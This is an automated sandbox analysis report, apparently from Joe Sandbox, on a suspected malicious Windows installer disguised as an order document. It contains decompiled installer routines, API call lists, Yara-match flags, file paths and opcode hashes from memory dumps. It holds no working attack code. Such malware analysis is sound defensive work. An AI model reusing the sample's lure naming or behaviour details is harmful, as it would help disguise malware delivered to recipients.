                                                              								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                              							}
                                                              						}
                                                              						goto L20;
                                                              					}
                                                              					if(_a12 >> 0x10 != 0x300) {
                                                              						goto L53;
                                                              					}
                                                              					_a8 = 0x40f;
                                                              					goto L12;
                                                              				} else {
                                                              					_t166 = GetDlgItem(_t167, 0x3fb);
                                                              					if(E00405A5D(_t146) != 0 && E00405A91(_t146) == 0) {
                                                              						E004059E6(_t146);
                                                              					}
                                                              					 *0x7a7a18 = _t167;
                                                              					SetWindowTextW(_t166, _t146);
                                                              					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                              					_push(1);
                                                              					E004040F6(_t167);
                                                              					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                              					_push(0x14);
                                                              					E004040F6(_t167);
                                                              					E0040412B(_t166);
                                                              					_t138 = E00406408(6);
                                                              					if(_t138 == 0) {
                                                              						L53:
                                                              						return E0040415D(_a8, _a12, _a16);
                                                              					} else {
                                                              						 *_t138(_t166, 1);
                                                              						goto L8;
                                                              					}
                                                              				}
                                                              			}














































                                                              0x00404591
                                                              0x00404597
                                                              0x0040459d
                                                              0x004045a1
                                                              0x004045a4
                                                              0x004045aa
                                                              0x004045b8
                                                              0x004045bb
                                                              0x004045c3
                                                              0x004045c9
                                                              0x004045c9
                                                              0x004045d5
                                                              0x004045d8
                                                              0x00404646
                                                              0x0040464d
                                                              0x00404724
                                                              0x0040472b
                                                              0x0040473a
                                                              0x0040473a
                                                              0x0040473e
                                                              0x00404748
                                                              0x00404755
                                                              0x00404757
                                                              0x00404757
                                                              0x00404765
                                                              0x0040476c
                                                              0x00404773
                                                              0x00404776
                                                              0x004047b2
                                                              0x004047b4
                                                              0x004047ba
                                                              0x004047bf
                                                              0x004047c3
                                                              0x004047c5
                                                              0x004047c5
                                                              0x004047e1
                                                              0x00000000
                                                              0x004047e3
                                                              0x004047e6
                                                              0x004047f4
                                                              0x004047fa
                                                              0x004047fb
                                                              0x004047fe
                                                              0x00404801
                                                              0x00000000
                                                              0x00404801
                                                              0x00404778
                                                              0x0040477a
                                                              0x0040477e
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404780
                                                              0x00404780
                                                              0x0040478d
                                                              0x00404792
                                                              0x00000000
                                                              0x00000000
                                                              0x00404796
                                                              0x00404798
                                                              0x00404798
                                                              0x004047a1
                                                              0x004047a3
                                                              0x004047a8
                                                              0x004047ab
                                                              0x004047b0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x004047b0
                                                              0x0040480d
                                                              0x00404817
                                                              0x0040481a
                                                              0x0040481d
                                                              0x00404824
                                                              0x00404824
                                                              0x00404826
                                                              0x00404826
                                                              0x0040482b
                                                              0x0040482d
                                                              0x00404835
                                                              0x0040483c
                                                              0x0040483e
                                                              0x00404849
                                                              0x00404849
                                                              0x0040483e
                                                              0x00404850
                                                              0x00404859
                                                              0x00404863
                                                              0x0040486b
                                                              0x00404886
                                                              0x0040486d
                                                              0x00404876
                                                              0x00404876
                                                              0x0040486b
                                                              0x0040488b
                                                              0x00404890
                                                              0x00404895
                                                              0x0040489e
                                                              0x0040489e
                                                              0x004048a7
                                                              0x004048a9
                                                              0x004048a9
                                                              0x004048b5
                                                              0x004048bd
                                                              0x004048c7
                                                              0x004048c7
                                                              0x004048cc
                                                              0x00000000
                                                              0x004048cc
                                                              0x00404776
                                                              0x0040472d
                                                              0x00404734
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x00404734
                                                              0x00404653
                                                              0x0040465c
                                                              0x00404676
                                                              0x0040467b
                                                              0x00404685
                                                              0x0040468c
                                                              0x00404698
                                                              0x0040469b
                                                              0x0040469e
                                                              0x004046a5
                                                              0x004046ad
                                                              0x004046b0
                                                              0x004046b4
                                                              0x004046bb
                                                              0x004046c3
                                                              0x0040471d
                                                              0x004046c5
                                                              0x004046c6
                                                              0x004046cd
                                                              0x004046d7
                                                              0x004046df
                                                              0x004046ec
                                                              0x00404700
                                                              0x00404704
                                                              0x00404704
                                                              0x00404700
                                                              0x00404709
                                                              0x00404716
                                                              0x00404716
                                                              0x004046c3
                                                              0x00000000
                                                              0x0040467b
                                                              0x00404669
                                                              0x00000000
                                                              0x00000000
                                                              0x0040466f
                                                              0x00000000
                                                              0x004045da
                                                              0x004045e7
                                                              0x004045f0
                                                              0x004045fd
                                                              0x004045fd
                                                              0x00404604
                                                              0x0040460a
                                                              0x00404613
                                                              0x00404616
                                                              0x00404619
                                                              0x00404621
                                                              0x00404624
                                                              0x00404627
                                                              0x0040462d
                                                              0x00404634
                                                              0x0040463b
                                                              0x004048d2
                                                              0x004048e4
                                                              0x00404641
                                                              0x00404644
                                                              0x00000000
                                                              0x00404644
                                                              0x0040463b

                                                              APIs
                                                              • GetDlgItem.USER32(?,000003FB), ref: 004045E0
                                                              • SetWindowTextW.USER32(00000000,-007A9000), ref: 0040460A
                                                              • SHBrowseForFolderW.SHELL32(?), ref: 004046BB
                                                              • CoTaskMemFree.OLE32(00000000), ref: 004046C6
                                                              • lstrcmpiW.KERNEL32(Call,007A1F40,00000000,?,-007A9000), ref: 004046F8
                                                              • lstrcatW.KERNEL32(-007A9000,Call), ref: 00404704
                                                              • SetDlgItemTextW.USER32(?,000003FB,-007A9000), ref: 00404716
                                                                • Part of subcall function 0040575B: GetDlgItemTextW.USER32(?,?,00000400,0040474D), ref: 0040576E
                                                                • Part of subcall function 004062C6: CharNextW.USER32(0040A300,*?|<>/":,00000000,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406329
                                                                • Part of subcall function 004062C6: CharNextW.USER32(0040A300,0040A300,0040A300,00000000), ref: 00406338
                                                                • Part of subcall function 004062C6: CharNextW.USER32(0040A300,"C:\Users\user\Desktop\Order_request_0003352030_Arcelormittal_837478220293874639220654_documents.exe",762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 0040633D
                                                                • Part of subcall function 004062C6: CharPrevW.USER32(0040A300,0040A300,762E3420,C:\Users\user\AppData\Local\Temp\,00000000,00403258,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034A9), ref: 00406350
                                                              • GetDiskFreeSpaceW.KERNEL32(0079FF10,?,?,0000040F,?,0079FF10,0079FF10,-007A9000,00000001,0079FF10,-007A9000,-007A9000,000003FB,-007A9000), ref: 004047D9
                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047F4
                                                                • Part of subcall function 0040494D: lstrlenW.KERNEL32(007A1F40,007A1F40,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-007A9000), ref: 004049EE
                                                                • Part of subcall function 0040494D: wsprintfW.USER32 ref: 004049F7
                                                                • Part of subcall function 0040494D: SetDlgItemTextW.USER32(?,007A1F40), ref: 00404A0A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Jansis$Call
                                                              • API String ID: 2624150263-4080112807
                                                              • Opcode ID: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                              • Instruction ID: 30da9b98090b1fe5a0259897bb92749c5f748b87693770e47a0c546725bed2a9
                                                              • Opcode Fuzzy Hash: 23919bb9406077de8126e392a934b699bf4a802904ea86574e2f4141f427e215
                                                              • Instruction Fuzzy Hash: 3FA19FB1900208ABDB11EFA5CD81AAFB7B8EF85354F10843BF601B62D1D77C89418B69
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MemoryProtectVirtual
                                                              • String ID: -ZUM$7ZjN$g0n4
                                                              • API String ID: 2706961497-2675036573
                                                              • Opcode ID: 55176bdc244dc38279fa61e82ac8c430289cddbeb847f6e949668680ec13170a
                                                              • Instruction ID: 53762e59d5abf27a59f489bd2c5fe2fa911b5fc145e2cbb3395b32d1add85ec7
                                                              • Opcode Fuzzy Hash: 55176bdc244dc38279fa61e82ac8c430289cddbeb847f6e949668680ec13170a
                                                              • Instruction Fuzzy Hash: 2E424B71A083C58FDB25CF38C9A87D67BE25F52360F498259CC998F296D3358546C712
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (g$3T1\
                                                              • API String ID: 0-3267231820
                                                              • Opcode ID: afe01cfb0668718a78019c6838ea768f2e0b9688d983b2aa50a55fcb76d7d5c8
                                                              • Instruction ID: 952612780e8ebe03de9297c241ba14f8854d735afd966f8c8da4c51fffa19dc6
                                                              • Opcode Fuzzy Hash: afe01cfb0668718a78019c6838ea768f2e0b9688d983b2aa50a55fcb76d7d5c8
                                                              • Instruction Fuzzy Hash: D4A14471A043499FEB308E388D657EB77A7AF95390F9A852EDC89D7214C3318981CB12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S$`
                                                              • API String ID: 0-1082937318
                                                              • Opcode ID: 07aefa9acce76c3498721bc1c97f0e8048e60bbaf9f6e1c653ffc365f8d53353
                                                              • Instruction ID: 461eb6cb8065a5ad3d5b4e4a7ad3b12f42aa8a76bb37754d904afb9783ef6462
                                                              • Opcode Fuzzy Hash: 07aefa9acce76c3498721bc1c97f0e8048e60bbaf9f6e1c653ffc365f8d53353
                                                              • Instruction Fuzzy Hash: 4131CA71A047898AEF389D7C88B93D737A79F80650F89812F8D098B141D73607898745
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: S$`
                                                              • API String ID: 0-1082937318
                                                              • Opcode ID: fdf6350ce426592ee6f7fb66d27b7cd9797b6cca75c5dd632abc320892f5bda0
                                                              • Instruction ID: f362e215c6a366b42363309541f61b7a2adc8277d03a02bf2c1b4edf516a8c34
                                                              • Opcode Fuzzy Hash: fdf6350ce426592ee6f7fb66d27b7cd9797b6cca75c5dd632abc320892f5bda0
                                                              • Instruction Fuzzy Hash: 64314E72B00745DADF384D388DF63DB3697AF90790F8A812FDD0987144D73686858B05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: aa154359fde91789a502dac773cce2896926553b5946669bed62a6e0981b5cc3
                                                              • Instruction ID: f0633d57670119cd41d555d6047a31e97a0b2afa85a99927969407aa7505716f
                                                              • Opcode Fuzzy Hash: aa154359fde91789a502dac773cce2896926553b5946669bed62a6e0981b5cc3
                                                              • Instruction Fuzzy Hash: 7B02ACC3F3F31989E7832030D6717E65740DF275C6D21CB6A5E26B15A27B2F4A8E8494
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: bfbcd10753c34917a8a1fec08bfe51fe0d926c672f347214afc7ffec58ec7306
                                                              • Instruction ID: 76315a446c7d0dea584a6cbe0ff938cbf67c6a70df7c0f05c7cd67710a5e1ee9
                                                              • Opcode Fuzzy Hash: bfbcd10753c34917a8a1fec08bfe51fe0d926c672f347214afc7ffec58ec7306
                                                              • Instruction Fuzzy Hash: 9702ABC3F3B31589E7832030D6717E65740DF275C6D11CB6A4A2AB15A27B2F4A8E8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: 11fb85fc00c4fb647bbdb2c4acdbf494a521314854cd0c5bfa12d8fc567c227b
                                                              • Instruction ID: ab935ef72b06b85d8d42145bbe8de459e708f03552db04fb360299993646ee17
                                                              • Opcode Fuzzy Hash: 11fb85fc00c4fb647bbdb2c4acdbf494a521314854cd0c5bfa12d8fc567c227b
                                                              • Instruction Fuzzy Hash: FB02ABC3F3B31989E7832030D6317E65780DF275C6D11CB6A8E26B15A27B2F4A8E8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: fb0465e93832f86fa54c5ee9a5fa71a10771d8e4fc86ceef91d2cb564b4e26b6
                                                              • Instruction ID: 94828f73fc01d14f307972dc40abb2f12b351d83c20327eedd265aa460d1bbc7
                                                              • Opcode Fuzzy Hash: fb0465e93832f86fa54c5ee9a5fa71a10771d8e4fc86ceef91d2cb564b4e26b6
                                                              • Instruction Fuzzy Hash: 2002ABC3F3B31999E3833030D6717E65740DF275C6D51CB6A8A3AB15A27B2F4A8E8494
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: cf97099d7e90e18d4b473efa6f4d68208aef3be84832d7bc0c786eaef1e442fb
                                                              • Instruction ID: 713e027c4cb9edc17c117b1c36a53bdc9a3a5c978610087cb7e5dce77e42af1e
                                                              • Opcode Fuzzy Hash: cf97099d7e90e18d4b473efa6f4d68208aef3be84832d7bc0c786eaef1e442fb
                                                              • Instruction Fuzzy Hash: D202ABC3F3F31989E7832030D6717E65780DF275C6D21CB6B5A26B15A27B2F4A8E8494
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Du .
                                                              • API String ID: 0-777687968
                                                              • Opcode ID: cf37597f9978a8065587ab44c368d675fd96bcd6c5eb8bfc287aaab07b1980ea
                                                              • Instruction ID: a5b2afb68db1112892b1bdccf2ca687043aaa42bef90627b20f4f1bdaace0378
                                                              • Opcode Fuzzy Hash: cf37597f9978a8065587ab44c368d675fd96bcd6c5eb8bfc287aaab07b1980ea
                                                              • Instruction Fuzzy Hash: 3C02ABC3F3F31589E7832030D6717E65780DF275C6D21CB6B5A26B15A27B2F4A8E8494
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: .FFF
                                                              • API String ID: 0-740489797
                                                              • Opcode ID: be4e3e5ae64fc4e8f76135938e02d16de8c3e9c9f2f9edd18d59b02b0a0c1edb
                                                              • Instruction ID: a86426ac6f36b488302837c062dd30e5c1fe38445c11ae71749cc433d502e851
                                                              • Opcode Fuzzy Hash: be4e3e5ae64fc4e8f76135938e02d16de8c3e9c9f2f9edd18d59b02b0a0c1edb
                                                              • Instruction Fuzzy Hash: CAA1D0D7F3B31989E793203086717E76780CF135C2E528B5B4E3AB15A2772F4A8E8594
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8(((
                                                              • API String ID: 0-1248665178
                                                              • Opcode ID: 042f862adb331089b504471c522153d960f289fe723fbaf173e91ebd1a519edf
                                                              • Instruction ID: e90f01ef2ad5ee5822953b0a48ded65f2540442fcb945a9818ba8839b43300f3
                                                              • Opcode Fuzzy Hash: 042f862adb331089b504471c522153d960f289fe723fbaf173e91ebd1a519edf
                                                              • Instruction Fuzzy Hash: 25A1BBD7F2A70589E7533074C1717E22B81DF171C2E228B5B8E2E715A2771F0A8EC994
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 8(((
                                                              • API String ID: 0-1248665178
                                                              • Opcode ID: 62c89b4a9328a6485199895a00daa69cebd726e97e8cfbac626f98e38dc460ff
                                                              • Instruction ID: 84d4d3b31edc8530dce96d2e64466e2453bb2ee50cb87bff7a193ffacf78cc8f
                                                              • Opcode Fuzzy Hash: 62c89b4a9328a6485199895a00daa69cebd726e97e8cfbac626f98e38dc460ff
                                                              • Instruction Fuzzy Hash: 9FA1BBD7F2A70989E7533075C1717E21B81DF271C2E22CB5B8E2E715A1772F0A8E8994
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 39%
                                                              			E004027FB(short __ebx, short* __esi) {
                                                              				void* _t21;
                                                              
                                                              				if(FindFirstFileW(E00402BBF(2), _t21 - 0x2b0) != 0xffffffff) {
                                                              					E00405F79( *((intOrPtr*)(_t21 - 0x10)), _t8);
                                                              					_push(_t21 - 0x284);
                                                              					_push(__esi);
                                                              					E00406032();
                                                              				} else {
                                                              					 *((short*)( *((intOrPtr*)(_t21 - 0x10)))) = __ebx;
                                                              					 *__esi = __ebx;
                                                              					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t21 - 4));
                                                              				return 0;
                                                              			}




                                                              0x00402813
                                                              0x0040282e
                                                              0x00402839
                                                              0x0040283a
                                                              0x00402970
                                                              0x00402815
                                                              0x00402818
                                                              0x0040281b
                                                              0x0040281e
                                                              0x0040281e
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040280A
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FileFindFirst
                                                              • String ID:
                                                              • API String ID: 1974802433-0
                                                              • Opcode ID: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                              • Instruction ID: a3d3032162d61e1c1d424b84de3592b50f389daf4c4fdff0a19fa7bc5af75a0d
                                                              • Opcode Fuzzy Hash: 75eab62fdf78de9f4e6b4c6b34eb097f986102a6510b1718f60f797d7a21670f
                                                              • Instruction Fuzzy Hash: 2BF05E716001149BC701EBA4DE49AAEB378FF04324F10457BE115E31D1D6B88A409B29
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (g
                                                              • API String ID: 0-1788970778
                                                              • Opcode ID: ef7f3d1f490399455916bee86364b2ee6d432ab452aa37cd0e837ae60901fe51
                                                              • Instruction ID: 5105f1fbf91f74b701267ca1b14e408bb88afbe8a793331fd038c09647d5c827
                                                              • Opcode Fuzzy Hash: ef7f3d1f490399455916bee86364b2ee6d432ab452aa37cd0e837ae60901fe51
                                                              • Instruction Fuzzy Hash: 74812271A043499FDB309E28CC657EB77EBAF593A0F96442ECC89DB250D3318985CB12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (g
                                                              • API String ID: 0-1788970778
                                                              • Opcode ID: cffff4c54bded35cba3862c84516db22760d0b53ee5c43e5e6cc984c25406446
                                                              • Instruction ID: 283e0777a72e13f7eaa52df5d87e04f769fd1ba4981d56f42d66488aab03da30
                                                              • Opcode Fuzzy Hash: cffff4c54bded35cba3862c84516db22760d0b53ee5c43e5e6cc984c25406446
                                                              • Instruction Fuzzy Hash: 89513531A043499FDB309E7888657EA77E7AF4A360F96452FCCC9DB251D3314985CB42
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_2fa0000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID: wK
                                                              • API String ID: 0-900654275
                                                              • Opcode ID: 1d4dbf003a07cba8c55fdebd44a55c62af1d0fe768af0732f65f98129badb047
                                                              • Instruction ID: d8209b56ea2f7a885099fb1399270e944558d84e511f08c63bb09a3ae7b8d065
                                                              • Opcode Fuzzy Hash: 1d4dbf003a07cba8c55fdebd44a55c62af1d0fe768af0732f65f98129badb047
                                                              • Instruction Fuzzy Hash: C561267590839A8FDF358E3889553CA3772EF52394F65007DCC899B516C3724A8A8B05
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63199754839.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
